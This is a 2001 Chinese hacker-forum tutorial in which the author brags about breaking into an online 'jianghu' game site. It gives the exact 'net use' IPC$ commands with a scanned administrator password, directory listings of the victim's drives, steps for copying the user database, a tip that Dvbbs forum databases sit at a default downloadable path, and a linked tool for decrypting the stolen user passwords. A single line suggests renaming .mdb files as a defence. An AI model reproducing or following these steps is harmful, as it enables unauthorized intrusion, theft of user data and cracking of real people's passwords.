最近网上流行江湖,玩江湖的朋友都会找一些工具或者漏洞来提升自己的等级。有些网友也会到我的论坛发表疑问,可我是菜鸟级人物,要深入探讨江湖漏洞还为时尚早,昨天我用IPC进入一个江湖网站后把他的数据库下载了,从中得到一些心得,不敢独享,拿出来让您见笑了:)
好,废话少说,开始讲讲我的下载过程。
首先我用小榕的流光扫描这个江湖网站,得到了一个IPC的ADMIN组的用户名和密码。
假设这个网站IP为192.168.100.1 用户为administrator 密码为123
用net命令进入
net use \\192.168.100.1\ipc$ “123” /user:administrator
提示命令成功完成
dir \\192.168.100.1\c$
进入他的C盘
一般网站存放的默认路径都会在inetpub\wwwroot目录下,但很多网站都不是如此,这样我们就要查找他的存放目录了!
可以用 dir \\192.168.100.1\c$\文件名 /s 来查找,文件名可以在网站上任意一个文件,如图片来查找,可以用鼠标右击选择属性来得到图片的文件名:)因为我们要查后缀名为.mdb的数据库文件,所以也可以用dir \\192.168.100.1\c$\*.mdb /a/s 来查找。
呵呵,这个网站的文件备份工作还是做的不错的,害我查了半天,最后得到他的江湖文件在d$\ftp\koing\xajh里。
C:\>dir \\192.168.100.1\d$\ftp\koing\xajh\
驱动器 \\192.168.100.1\d$ 中的卷没有标签。
卷的序列号是 D03E-DD81
\\192.168.100.1\d$\ftp\koing\xajh 的目录
2001-11-05 21:27 <DIR> .
2001-11-05 21:27 <DIR> ..
2001-06-28 01:57 15,193 1.mid
2001-04-22 17:11 43,389 122.mid
2001-10-24 07:28 <DIR> adminbz
2001-07-10 22:27 518,566 adminbz.rar
2001-06-25 19:41 68,851 an.txt
2001-06-27 04:46 3,405 ao.asp
2001-11-29 00:01 <DIR> bao
2001-07-10 22:30 13,704 bao.rar
2001-10-24 07:28 <DIR> bet
2001-06-07 22:18 2,467 bombsee.asp
2001-10-24 07:28 <DIR> cao12387
2001-10-24 07:28 <DIR> chat
2001-10-05 00:02 9,663 check.asp
2001-10-01 08:52 200 chszsj43.chh
2001-06-07 22:24 1,921 close.asp
2001-06-07 22:24 4,736 closeme.asp
2001-06-08 21:57 327 conn.asp
2001-06-08 21:57 615 conn1.asp
2001-12-09 10:12 <DIR> cp
2001-10-24 07:28 <DIR> css
2001-06-06 10:49 926 css.css
2001-06-07 22:18 2,539 daibuse2e.asp
2001-06-07 22:19 1,935 dajiasee.asp
2001-12-09 10:52 <DIR> data
2001-06-08 21:57 378 data.asp
2001-06-07 22:19 328 data1.asp
2001-06-07 22:19 4,020 data2.asp
2001-10-24 07:27 <DIR> dati
2001-11-05 21:41 <DIR> dc
2001-10-11 07:38 10,355 default.asp
2001-06-28 21:02 8,010 default000.asp
2001-06-27 03:21 7,176 default00000.asp
2001-10-01 14:11 4,434 default328.asp
2001-08-05 07:28 4,427 defaultold.asp
2001-10-24 07:27 <DIR> dg
2001-06-07 22:19 1,919 disp.asp
2001-06-30 04:34 16,093 error.asp
2001-09-17 21:27 2,495 exit.asp
2001-06-07 22:19 509 fun.inc
2001-10-06 15:27 50,904 func.asp
2003-09-15 01:06 27,997 g.gif
2001-06-13 20:11 7,195 Global.asa
2001-06-07 22:19 2,608 guanfu.htm
2001-11-19 23:48 <DIR> guanli
2001-06-07 22:19 2,550 guanlisee.asp
2001-12-09 10:19 <DIR> gupiao
2001-10-24 07:27 <DIR> hcjs
2001-12-09 10:44 <DIR> hunyin
2001-10-24 07:27 <DIR> imagejh
2001-10-24 07:27 <DIR> images
2001-10-24 07:27 <DIR> img
2001-07-05 21:09 13,960 java.txt
2001-10-24 07:27 <DIR> jh
2001-12-07 00:08 24,805 jh.asp
2001-06-07 22:19 247 jh.css
2001-06-28 21:02 27,325 jh0.asp
2001-06-28 21:02 27,325 jh10.asp
2001-07-05 21:03 10,211 jh2.asp
2001-06-07 22:19 3,348 jhb.mid
2001-11-19 23:11 <DIR> jhmp
2001-06-07 22:19 2,545 jianjinsee.asp
2001-12-09 10:39 <DIR> jiaoyou
2001-06-07 22:20 2,446 jinggaosee.asp
2003-09-14 18:48 2,109 joe.js
2001-06-07 22:20 4,240 joinchat.asp
2001-06-07 22:20 2,263 ku.asp
2001-10-24 07:27 <DIR> laiya
2001-06-07 22:20 257 login.asp
2001-11-07 13:16 <DIR> lsm
2001-10-24 07:27 <DIR> midi
2001-10-24 07:27 <DIR> myhome
2001-06-07 22:20 0 new.css
2001-06-07 22:20 530 NEW2.CSS
2001-06-07 22:20 3,394 ok.asp
2001-10-24 07:27 <DIR> ok1ok
2001-06-07 22:20 510 online.asp
2001-12-09 10:49 <DIR> quest
2001-06-07 22:20 1,612 readme.htm
2003-09-14 19:09 805 s.css
2001-06-08 21:57 3,764 set.asp
2001-06-07 22:20 623 setup.css
2001-06-07 22:20 2,509 setwg3.asp
2001-06-07 22:20 322 showimg.asp
2001-07-09 14:30 0 showuser.asp
2001-10-24 07:27 <DIR> street
2001-06-07 22:20 464 style.css
2001-06-07 22:20 515 style1.css
2001-12-09 06:36 <DIR> sy
2003-09-15 01:19 31,744 t.fla
2003-09-15 01:09 9,150 t.swf
2001-06-28 01:55 12,485 tiandadd.mid
2001-10-24 07:27 <DIR> top
2001-07-05 20:28 4,165 txt.asp
2001-07-09 14:50 2,190 txt.gif
2001-12-07 00:11 1,770 whatnew.asp
2001-10-24 07:27 <DIR> work
2001-06-07 22:24 12,670 xajh.gif
2001-06-07 22:20 2,024 xg.asp
2001-10-24 07:27 <DIR> yamen
2001-10-24 07:27 <DIR> zjj
2001-06-07 22:20 2,354 zuolaosee.asp
68 个文件 1,054,516 字节
35 个目录 2,743,296,000 可用字节
数据库文件在哪呢?呵呵,虽然我不懂英语,但data这单词还是懂的:)
C:\>dir \\192.168.100.1\d$\ftp\koing\xajh\data
驱动器 \\192.168.100.1\d$ 中的卷没有标签。
卷的序列号是 D03E-DD81
\\192.168.100.1\d$\ftp\koing\xajh\data 的目录
2001-12-09 10:52 <DIR> .
2001-12-09 10:52 <DIR> ..
2001-07-09 18:31 0 dag364.TMP
2001-07-09 18:30 0 dagF2C4.TMP
2001-12-09 10:51 167,936 jilu.mdb
2001-12-09 03:46 397,312 kill.asa
2001-12-09 10:52 31,461,376 user.asa
2001-12-09 10:52 0 user.ldb
2001-08-09 18:34 990,176 用户
7 个文件 33,016,800 字节
2 个目录 2,743,296,000 可用字节
江湖数据库的一般都是以Access形式保存的,后缀名为.mdb,是可以下载的。现在的一些ASP制作的论坛也是如此,只要我们知道数据库的绝对路径我们都可以下载到硬盘,然后查看超级管理员的帐号和密码,不如动网论坛的数据库默认存放路径是bbs/dv3sr2.mdb 很多网站都没有修改,笔者也曾经成功下载了几次动网的数据库:)在此我建议大家直接把数据库的后缀名改成.asp这样也照常浏览,却不能下载了~!
好,现在我们看看文件有jilu.mdb、kill.asa、user.asa 这三个文件,我首先下载jilu.mdb文件,在IE地址栏输入192.168.100.1/xajh/jilu.mdb 呵,成功下载回来,打开文件(首先必须安全OFFICE 2000里的Microsoft Access)哎呀,竟然不是,再看看user.asa 呵呵,这不是用户文件吗?容量很大,刚好符合!试试能不能下载输入 192.168.100.1/user.asa 昏,系统提示出现500错误!
怎么办?我不知怎么就认定这个文件一定就是(虽然我并不知道.asa文件是做什么的)
网友提点我可以把文件影射到本地来啊。
命令是:net use x: \\192.168.100.1\d$
这下他的D盘就变你的X盘了。
也可以用copy \\192.168.100.1\d$\ftp\koing\xajh\data\user.asa c:
这样就直接把文件COPY到你的C盘了:)
而笔者是用网上邻居的方法进入的
点击网上邻居——>添加网上邻居,在请键入网上邻居位置上打上网址:\\192.168.100.1\d$\ftp\koing\xajh\data\ 点完成。
呵呵,看见文件了,把他复制到本地硬盘来就行了!
好久,30M呢,还好是小江湖,我可是“猫网”,555~~~
下载后把他的后缀名改成.mdb,打开,呵呵,出来了!
看,全部注册信息——昏~~~怎么密码全象是乱码??好象是加密了?5555~~~我下载了那么久啊!!想想好象前不久看见有个叫ASP江湖密码解密机的!下载后把数据库里的密码复制了如果放在“加密后的密码”选项里,点“解密”呵呵,真密码出来啦~~
ASP江湖密码解密机在本站有下载
地址:http://www.my87135.com/freehome/zyym/down/download.asp?Did=1839
文件大小:10K (好小)
好了,文章到此结束。
小弟以前都在学网页设计,如今初学这玩意,还有很多不懂的地方需要各位前辈来指点与教导!此次由于我命令不熟悉,害我走了许多弯路,该拿起书本好好背命令了。
幽冥
e-mail:lizihao@21cn.com
网站:http://xnhacker.6to23.com
广结天下黑客
共筑网络长城
弘扬黑客精神
力争做到最好
2001-12-9
